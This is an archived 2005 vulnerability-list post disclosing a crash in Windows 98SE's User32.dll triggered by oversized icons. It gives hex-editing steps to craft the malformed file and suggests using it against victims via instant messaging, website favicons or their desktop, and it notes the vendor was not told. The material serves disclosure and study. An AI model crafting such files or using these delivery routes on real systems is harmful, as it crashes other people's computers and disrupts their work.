Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

User32.dll Icon Size Crash

from [- k -] Network Security [Permanent Link]
Subject: User32.dll Icon Size Crash
Date: Wed, 25 May 2005 16:18:23 -0300 
Andres Rey  - (User32.dll Icon Size Crash)


---------------------------------------------------

Application: User32.dll (Windows 98SE Version (4.10.2222)) (Maybe other
Windows versions too)
Bug: Crash  the program that attempts to open the icon
Explotation: Local / Remote*
Author: Andres Rey (andreskrey@gmail.com)

(* Only sometimes can be used as a remote exploit, see point 5)

---------------------------------------------------

1) Introduction
2) Bug
3) PoC
4) Making the exploit
5) Examples of the Real Life
6) Disclosure

---------------------------------------------------


==============
1) Introduction
==============


User32.dll Is a core component of the Windows kernel


==============
2) Bug
==============


The bug is (probably) in the LoadIconA function of user32.dll. When it reads
a bitmap with the extention .ico and it has a large size (65535x65535), the
dll crash, and the program that called the function gets killed


==============
2) PoC
==============


The attached file is a zip with the bitmap/icon compressed. Just decompress
it to a folder and open it (Explorer.exe will crash), or open with any
program that can load a icon (The program will crash)

WARNING!: Don't decompress to the desktop!!, or your explorer.exe will crash
and crash and crash until you delete the icon


==============
4) Making the exploit
==============


Just open a bitmap in a hexa editor and modify the width and height data:

Locate the "XXXX" values...

----------------------------------------------------------------------------
00000000  :  424D 38F9 1500 0000 0000 3600 0000 2800 0000 XXXX
00000010  :  0000 XXXX 0000 0100 1800 0000 0000 02F9 1500 120B
----------------------------------------------------------------------------

...and change to:

----------------------------------------------------------------------------
00000000  :  424D 38F9 1500 0000 0000 3600 0000 2800 0000 FFFF
00000010  :  0000 FFFF 0000 0100 1800 0000 0000 02F9 1500 120B
----------------------------------------------------------------------------

Then change the extention to ".ico". Notice that the system will crash. (I
use Total Commander with the icons disabled to manipulate the file)


==============
5) Examples of the Real Life
==============


         1. Send it through IM
         2. Set it as "favicon" of the web pages (<--- Remote version)
         3. Put in the desktop of the victim to crash the system everytime
             it starts
         4. Etc.


==============
7) Disclosure
==============


Microsoft wasn't notified
(Don't know the bugs mail!, it's askbill@microsoft.com?)


----------------------------------


That's all, hope you found it usefull



Andres Rey
andreskrey@gmail.com

Attachment: exploit.zip
Description: Zip compressed data

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  PostNuke Critical SQL Injection and XSS 0.750=>x, sp3x
Next by Date:  [Full-disclosure] [AppSecInc Advisory BEA05-V0101] BEA WebLogic Administration Console login page cross-site scripting vulnerability, Team SHATTER
Previous by Thread:  PostNuke Critical SQL Injection and XSS 0.750=>x, sp3x
Next by Thread:  Re: User32.dll Icon Size Crash, Daniel Souza
Indexes:  [Date] [Thread] [Top] [All Lists]